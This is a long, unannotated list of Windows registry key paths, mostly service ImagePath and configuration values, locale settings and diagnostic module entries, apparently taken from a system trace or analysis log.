HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\IPBusEnum\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\IPBusEnum\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPAutoReg\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPAutoReg\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\QWAVE\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\QWAVE\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\QWAVE\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\RequiredPrivileges HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-19\ProfileImagePath HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Environment HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ObjectName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000\ProfileImagePath HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\ObjectName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\CoInitializeSecurityParam HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\AuthenticationLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\ImpersonationLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\AuthenticationCapabilities HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\CoInitializeSecurityAppID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\DeferredCoInitializeSecurityServices HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\DefaultRpcStackSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\SystemCritical HKEY_CURRENT_USER\Control Panel\International\LocaleName HKEY_CURRENT_USER\Control Panel\International\sCountry HKEY_CURRENT_USER\Control Panel\International\sList HKEY_CURRENT_USER\Control Panel\International\sDecimal HKEY_CURRENT_USER\Control Panel\International\sThousand HKEY_CURRENT_USER\Control Panel\International\sGrouping HKEY_CURRENT_USER\Control Panel\International\sNativeDigits HKEY_CURRENT_USER\Control Panel\International\sCurrency HKEY_CURRENT_USER\Control Panel\International\sMonDecimalSep HKEY_CURRENT_USER\Control Panel\International\sMonThousandSep HKEY_CURRENT_USER\Control Panel\International\sMonGrouping HKEY_CURRENT_USER\Control Panel\International\sPositiveSign HKEY_CURRENT_USER\Control Panel\International\sNegativeSign HKEY_CURRENT_USER\Control Panel\International\sTimeFormat HKEY_CURRENT_USER\Control Panel\International\sShortTime HKEY_CURRENT_USER\Control Panel\International\s1159 HKEY_CURRENT_USER\Control Panel\International\s2359 HKEY_CURRENT_USER\Control Panel\International\sShortDate HKEY_CURRENT_USER\Control Panel\International\sYearMonth HKEY_CURRENT_USER\Control Panel\International\sLongDate HKEY_CURRENT_USER\Control Panel\International\iCountry HKEY_CURRENT_USER\Control Panel\International\iMeasure HKEY_CURRENT_USER\Control Panel\International\iPaperSize HKEY_CURRENT_USER\Control Panel\International\iDigits HKEY_CURRENT_USER\Control Panel\International\iLZero HKEY_CURRENT_USER\Control Panel\International\iNegNumber HKEY_CURRENT_USER\Control Panel\International\NumShape HKEY_CURRENT_USER\Control Panel\International\iCurrDigits HKEY_CURRENT_USER\Control Panel\International\iCurrency HKEY_CURRENT_USER\Control Panel\International\iNegCurr HKEY_CURRENT_USER\Control Panel\International\iCalendarType HKEY_CURRENT_USER\Control Panel\International\iFirstDayOfWeek HKEY_CURRENT_USER\Control Panel\International\iFirstWeekOfYear HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ServiceDll HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ServiceManifest HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ServiceMain HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\InitialTimeout HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\InitialSystemCacheSize HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\MaximumSystemCacheSize HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\InitialUserCacheSize HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\MaximumUserCacheSize HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ServiceDllUnloadOnStop HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\NeverLowerPagePriority 